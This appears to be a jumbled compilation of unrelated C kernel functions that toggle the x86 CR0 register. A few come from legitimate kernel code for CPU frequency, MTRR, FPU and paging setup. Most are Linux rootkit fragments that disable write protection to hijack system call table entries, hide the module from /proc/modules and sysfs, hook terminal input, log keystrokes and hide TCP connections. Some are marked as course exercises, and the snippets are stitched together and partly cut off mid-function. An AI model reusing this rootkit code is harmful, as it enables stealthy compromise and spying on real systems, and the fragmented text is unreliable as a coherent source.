static void powernow_k6_set_cpu_multiplier(unsigned int best_i) { unsigned long outvalue, invalue; unsigned long msrval; unsigned long cr0; /* we now need to transform best_i to the BVC format, see AMD#23446 */ /* * The processor doesn't respond to inquiry cycles while changing the * frequency, so we must disable cache. */ local_irq_disable(); cr0 = read_cr0(); write_cr0(cr0 | X86_CR0_CD); wbinvd(); outvalue = (1<<12) | (1<<10) | (1<<9) | (index_to_register[best_i]<<5); msrval = POWERNOW_IOPORT + 0x1; wrmsr(MSR_K6_EPMR, msrval, 0); /* enable the PowerNow port */ invalue = inl(POWERNOW_IOPORT + 0x8); invalue = invalue & 0x1f; outvalue = outvalue | invalue; outl(outvalue, (POWERNOW_IOPORT + 0x8)); msrval = POWERNOW_IOPORT + 0x0; wrmsr(MSR_K6_EPMR, msrval, 0); /* disable it again */ write_cr0(cr0); local_irq_enable(); }
static int __init syscall_init(void) { int ret; unsigned long addr; unsigned long cr0; syscall_table = (void **)find_sys_call_table(); if (!syscall_table) { printk(KERN_DEBUG "Cannot find the system call address\n"); return -1; } cr0 = read_cr0(); write_cr0(cr0 & ~CR0_WP); addr = (unsigned long)syscall_table; ret = set_memory_rw(PAGE_ALIGN(addr) - PAGE_SIZE, 3); if(ret) { printk(KERN_DEBUG "Cannot set the memory to rw (%d) at addr %16lX\n", ret, PAGE_ALIGN(addr) - PAGE_SIZE); } else { printk(KERN_DEBUG "3 pages set to rw"); } orig_sys_open = syscall_table[__NR_open]; syscall_table[__NR_open] = my_sys_open; write_cr0(cr0); return 0; }
static int __init hidden_init(void) { printk(KERN_INFO "Starting up module.\n"); /* Hide the module from proc/modules, Sys/modules tracking. */ list_del_init(&__this_module.list); kobject_del(&THIS_MODULE->mkobj.kobj); /* Locate address of the Syscall table in memory. */ if(!(sys_call_table = get_sys_call_table())) { printk(KERN_INFO "Unable to locate Syscall table."); return -1; } /* Disabling WP bit in control register cr0 to write to sys_call table. */ write_cr0(read_cr0() & (~ 0x10000)); /* Store open system call to use later. */ original_open = (void *)sys_call_table[__NR_open]; /* Write our modified read call to the syscall table. */ sys_call_table[__NR_open] = (unsigned long *) hidden_open; /* Turning WP bit back on. */ write_cr0(read_cr0() | 0x10000); return 0; }
void enable_hack(){ if (success!=1) { printk(KERN_INFO "Cannot enable, succes!=1\n"); return; } if (hacked) { printk(KERN_INFO "Already hooked\n"); return; } hacked=1; // disable kernel page write protection write_cr0 (read_cr0 () & (~ 0x10000)); // redirect system call to our wrapper routine //sys_call_table[__NR_getdents64] = hacked_getdents; sys_call_table[__NR_settimeofday] = hacked_settimeofday; sys_call_table[__NR_adjtimex] = hacked_adjtimex; sys_call_table[__NR_clock_settime] = hacked_clock_settime; // enable kernel page write protection back write_cr0 (read_cr0 () | 0x10000); printk(KERN_INFO "Syscall tampered #3. new clock_settime=%p\n", (void*) sys_call_table[__NR_clock_settime]); }
/*! * @fn void cpumon_Set_IDT_Func(idt, func) * * @param GATE_STRUCT* - address of the idt vector * @param PVOID - function to set in IDT * * @return None No return needed * * @brief Set up the interrupt handler. * @brief Save the old handler for restoration when done * */ static VOID cpumon_Set_IDT_Func ( GATE_STRUCT *idt, PVOID func ) { #if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,25) _set_gate(&idt[CPU_PERF_VECTOR], GATE_INTERRUPT, (unsigned long) func, 3, 0); #else #if LINUX_VERSION_CODE >= KERNEL_VERSION(3,10,0) unsigned long cr0_value; #endif GATE_STRUCT local; // _set_gate() cannot be used because the IDT table is not exported. pack_gate(&local, GATE_INTERRUPT, (unsigned long)func, 3, 0, __KERNEL_CS); // From 3.10 kernel, the IDT memory has been moved to a read-only location // which is controlled by the bit 16 in the CR0 register. // The write protection should be temporarily released to update the IDT. #if LINUX_VERSION_CODE >= KERNEL_VERSION(3,10,0) cr0_value = read_cr0(); write_cr0(cr0_value & ~X86_CR0_WP); #endif write_idt_entry((idt), CPU_PERF_VECTOR, &local); #if LINUX_VERSION_CODE >= KERNEL_VERSION(3,10,0) write_cr0(cr0_value); #endif #endif return; }
//The code that gets executed when the module is loaded static int initialize_sneaky_module(void) { struct page *page_ptr; //See /var/log/syslog for kernel print output printk(KERN_INFO "Sneaky module being loaded.\n"); printk(KERN_INFO "PID is %d\n", PID); //Turn off write protection mode write_cr0(read_cr0() & (~0x10000)); //Get a pointer to the virtual page containing the address //of the system call table in the kernel. page_ptr = virt_to_page(&sys_call_table); //Make this page read-write accessible pages_rw(page_ptr, 1); //This is the magic! Save away the original 'open' system call //function address. Then overwrite its address in the system call //table with the function address of our new code. original_call = (void*)*(sys_call_table + __NR_open); *(sys_call_table + __NR_open) = (unsigned long)sneaky_sys_open; //getdents original_getdents = (void*)*(sys_call_table + __NR_getdents); *(sys_call_table + __NR_getdents) = (unsigned long)sneaky_sys_getdents; //read original_read = (void*)*(sys_call_table + __NR_read); *(sys_call_table + __NR_read) = (unsigned long)sneaky_sys_read; //Revert page to read-only pages_ro(page_ptr, 1); //Turn write protection mode back on write_cr0(read_cr0() | 0x10000); return 0; // to show a successful load }
void cleanup_module() { kfree(sock); /* Reset the "open" system call */ write_cr0 (read_cr0 () & (~ 0x10000)); syscall_table[__NR_mkdir] = original_mkdir; write_cr0 (read_cr0 () | 0x10000); printk(KERN_ALERT "HIJACK EXIT\n"); }
static int _init(void) { printk("rootkit loaded\n"); /*list_del_init(&__this_module.list);*/ /* /proc/modules */ /*kobject_del(&THIS_MODULE->mkobj.kobj);*/ /* /sys/modules */ write_cr0(read_cr0() & (~ 0x10000)); printk("tty_insert_flip_char: %p\n", tty_insert_flip_char); o_tty_insert_flip_char = (void *) xchg(tty_insert_flip_char, my_tty_insert_flip_char); write_cr0(read_cr0() | 0x10000); return 0; }
static void __exit syscall_release(void) { unsigned long cr0; cr0 = read_cr0(); write_cr0(cr0 & ~CR0_WP); syscall_table[__NR_open] = orig_sys_open; write_cr0(cr0); }
void _exit(void) { my_type* syscalltable = 0; syscalltable = (my_type* ) find(); if (syscalltable != 0) { write_cr0(read_cr0() & (~ 0x10000)); xchg(&syscalltable[__NR_getdents64], o_getdents64); write_cr0(read_cr0() | 0x10000); } printk("rootkit removed\n"); }
static void __exit jackle_end( void ) { if( !sys_call_table ) { return; } write_cr0( original_cr0 & ~0x00010000 ); sys_call_table[__NR_read] = ( unsigned long * )ref_sys_read; sys_call_table[__NR_open] = ( unsigned long * )ref_sys_open; write_cr0( original_cr0 ); }
// rm the kmod static void exit(void) { write_cr0 (read_cr0 () & (~ 0x10000)); // YOUR CODE HERE! // hint: you unhook here write_cr0 (read_cr0 () | 0x10000); printk(KERN_ALERT "MODULE EXIT\n"); }
static int init(void) { printk(KERN_ALERT "\nHIJACK INIT\n"); write_cr0 (read_cr0 () & (~ 0x10000)); original_write = (void *)syscall_table[__NR_write]; syscall_table[__NR_write] = new_write; write_cr0 (read_cr0 () | 0x10000); return 0; }
static void exit(void) { write_cr0 (read_cr0 () & (~ 0x10000)); syscall_table[__NR_write] = original_write; write_cr0 (read_cr0 () | 0x10000); printk(KERN_ALERT "MODULE EXIT\n"); return; }
static void __exit rootkit_end(void) { if(!sys_call_table) { return; } // turn off memory protection write_cr0(original_cr0 & ~0x00010000); // put the old system call back in place sys_call_table[__NR_read] = (unsigned long *)ref_sys_read; // memory protection back on write_cr0(original_cr0); }
/*init module insmod*/ static int init(void) { //Uncomment to hide this module list_del_init(&__this_module.list); struct tcp_seq_afinfo *my_afinfo = NULL; //proc_net is disappeared in 2.6.32, use init_net.proc_net struct proc_dir_entry *my_dir_entry = init_net.proc_net->subdir; write_cr0 (read_cr0 () & (~ 0x10000)); if(_KEYLOG_){ o_read=(void *)sys_call_table[__NR_read]; sys_call_table[__NR_read]=h4x_read; } o_write=(void *)sys_call_table[__NR_write]; sys_call_table[__NR_write]=h4x_write; #if defined(__x86_64__) o_getdents=sys_call_table [__NR_getdents]; sys_call_table [__NR_getdents]=h4x_getdents; #elif defined(__i386__) o_getdents64=sys_call_table [__NR_getdents64]; sys_call_table [__NR_getdents64]=h4x_getdents64; #else #error Unsupported architecture #endif o_unlink = sys_call_table [__NR_unlink]; sys_call_table [__NR_unlink] = h4x_unlink; o_rmdir = sys_call_table [__NR_rmdir]; sys_call_table [__NR_rmdir] = h4x_rmdir; o_unlinkat = sys_call_table [__NR_unlinkat]; sys_call_table [__NR_unlinkat] = h4x_unlinkat; o_rename = sys_call_table [__NR_rename]; sys_call_table [__NR_rename] = h4x_rename; o_open = sys_call_table [__NR_open]; sys_call_table [__NR_open] = h4x_open; o_kill = sys_call_table [__NR_kill]; sys_call_table [__NR_kill] = h4x_kill; o_delete_module = sys_call_table [__NR_delete_module]; sys_call_table [__NR_delete_module] = h4x_delete_module; write_cr0 (read_cr0 () | 0x10000); while(strcmp(my_dir_entry->name, "tcp")) my_dir_entry = my_dir_entry->next; if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data)) { //seq_show is disappeared in 2.6.32, use seq_ops.show old_tcp4_seq_show = my_afinfo->seq_ops.show; my_afinfo->seq_ops.show = h4x_tcp4_seq_show; } return 0; }
int init_module() { printk(KERN_ALERT "\nHIJACK INIT\n"); if (do_connect()) printk(KERN_ALERT "Error initializing control socket.\n"); /* Override the "open" system call */ write_cr0 (read_cr0 () & (~ 0x10000)); original_mkdir = (void *)syscall_table[__NR_mkdir]; syscall_table[__NR_mkdir] = new_mkdir; write_cr0 (read_cr0 () | 0x10000); return 0; }
// install the kmod static int init(void) { printk(KERN_ALERT "Entering the kernel\n"); // disable write protection, flip bit write_cr0 (read_cr0 () & (~ 0x10000)); // YOUR CODE HERE! // hint: you do the hook here // enable write protection, flip bit write_cr0 (read_cr0 () | 0x10000); return 0; }
static void enable_page_protection(void) { unsigned long cr0 = read_cr0(); cr0 |= (1 << 16); write_cr0(cr0); }
/* Put the processor into a state where MTRRs can be safely set */ void set_mtrr_prepare_save(struct set_mtrr_context *ctxt) { unsigned int cr0; /* Disable interrupts locally */ local_irq_save(ctxt->flags); if (use_intel() || is_cpu(CYRIX)) { /* Save value of CR4 and clear Page Global Enable (bit 7) */ if ( cpu_has_pge ) { ctxt->cr4val = read_cr4(); write_cr4(ctxt->cr4val & ~X86_CR4_PGE); } /* Disable and flush caches. Note that wbinvd flushes the TLBs as a side-effect */ cr0 = read_cr0() | 0x40000000; wbinvd(); write_cr0(cr0); wbinvd(); if (use_intel()) /* Save MTRR state */ rdmsr(MTRRdefType_MSR, ctxt->deftype_lo, ctxt->deftype_hi); else /* Cyrix ARRs - everything else were excluded at the top */ ctxt->ccr3 = getCx86(CX86_CCR3); } }
/* Restore the processor after a set_mtrr_prepare */ void set_mtrr_done(struct set_mtrr_context *ctxt) { if (use_intel() || is_cpu(CYRIX)) { /* Flush caches and TLBs */ wbinvd(); /* Restore MTRRdefType */ if (use_intel()) /* Intel (P6) standard MTRRs */ mtrr_wrmsr(MTRRdefType_MSR, ctxt->deftype_lo, ctxt->deftype_hi); else /* Cyrix ARRs - everything else was excluded at the top */ setCx86(CX86_CCR3, ctxt->ccr3); /* Enable caches */ write_cr0(read_cr0() & 0xbfffffff); /* Restore value of CR4 */ if ( cpu_has_pge ) write_cr4(ctxt->cr4val); } /* Re-enable interrupts locally (if enabled previously) */ local_irq_restore(ctxt->flags); }
static void enable_page_protection(void) { /* See the above description for cr0. Here, we use an OR to set the 16th bit to re-enable write protection on the CPU. */ write_cr0 (read_cr0 () | 0x10000); }
/* * The earliest FPU detection code. * * Set the X86_FEATURE_FPU CPU-capability bit based on * trying to execute an actual sequence of FPU instructions: */ static void fpu__init_system_early_generic(struct cpuinfo_x86 *c) { unsigned long cr0; u16 fsw, fcw; fsw = fcw = 0xffff; cr0 = read_cr0(); cr0 &= ~(X86_CR0_TS | X86_CR0_EM); write_cr0(cr0); asm volatile("fninit ; fnstsw %0 ; fnstcw %1" : "+m" (fsw), "+m" (fcw)); if (fsw == 0 && (fcw & 0x103f) == 0x003f) set_cpu_cap(c, X86_FEATURE_FPU); else clear_cpu_cap(c, X86_FEATURE_FPU); #ifndef CONFIG_MATH_EMULATION if (!cpu_has_fpu) { pr_emerg("x86/fpu: Giving up, no FPU found and no math emulation present\n"); for (;;) asm volatile("hlt"); }
/* * Initialize the registers found in all CPUs, CR0 and CR4: */ static void fpu__init_cpu_generic(void) { unsigned long cr0; unsigned long cr4_mask = 0; if (cpu_has_fxsr) cr4_mask |= X86_CR4_OSFXSR; if (cpu_has_xmm) cr4_mask |= X86_CR4_OSXMMEXCPT; if (cr4_mask) cr4_set_bits(cr4_mask); cr0 = read_cr0(); cr0 &= ~(X86_CR0_TS|X86_CR0_EM); /* clear TS and EM */ if (!cpu_has_fpu) cr0 |= X86_CR0_EM; write_cr0(cr0); /* Flush out any pending x87 state: */ #ifdef CONFIG_MATH_EMULATION if (!cpu_has_fpu) fpstate_init_soft(¤t->thread.fpu.state.soft); else #endif asm volatile ("fninit"); }
void disable_hack_ia32(){ if (success_ia32!=1) return; if (!hacked_ia32) return; hacked_ia32=0; // // restore syscall table // write_cr0 (read_cr0 () & (~ 0x10000)); ia32_sys_call_table[__NR_ia32_adjtimex]=orig_compat_sys_adjtimex; ia32_sys_call_table[__NR_ia32_clock_settime]=orig_compat_sys_clock_settime; write_cr0 (read_cr0 () | 0x10000); printk(KERN_INFO "Syscall restored ia32.\n"); }
static int __init x86_create_initial_map() { unsigned long phy= 0; unsigned long *p = (unsigned long *)FAK_ARCH_X86_INIT_PGTABLE; //The kernel topmost table int i; for (i = 0; i < 1024; i++) p[i] = 0; /* Kernel part in 4mb page; */ for (i = 0; i < 1024; i++) { if (i == get_loaded_base() / 0x400000) phy = 0; //如果到了内核的地址,还是从0开始映射,因为内核装的物理地址实际是在开头; p[i] = phy | 0x83; //0x183 is the global phy += 0x400000; } write_cr3((unsigned long)p); phy = read_cr4(); phy |= X86_CR4_PSE | X86_CR4_PGE; //允许4MB页 write_cr4(phy); phy = read_cr0(); phy |= X86_CR0_PG; //打开页表; phy &= ~(X86_CR0_CD | X86_CR0_NW); //允许缓存; write_cr0(phy); return 0; }
inline void restore_wp ( unsigned long cr0 ) { write_cr0(cr0); barrier(); preempt_enable(); }
static inline void unprotect_memory(void) { // CR0[16] is Write Protect Bit // CR0[16] is unset to disable Write Protect write_cr0(cr0 & ~0x00010000); }
// cr0 is a control register in the x86 family of processors. // Bit 16 of that register is WP - Write protect: Determines whether // the CPU can write to pages marked read-only void enable_rw(void *ptr) { preempt_disable(); barrier(); original_rw_mask = read_cr0() & WRITE_PROTECT_MASK; write_cr0 (read_cr0() & (~ WRITE_PROTECT_MASK)); }
/* Enable paging on the CPU. Typically, a CPU start with paging disabled, and memory is accessed by addressing physical memory directly. After paging is enabled, memory is addressed logically. */ void PageTable::enable_paging() { //write the page_directory address into CR3 write_cr3((unsigned long)current_page_table->get_page_directory()); //set paging bit in CR0 to 1 write_cr0(read_cr0() | 0x80000000); }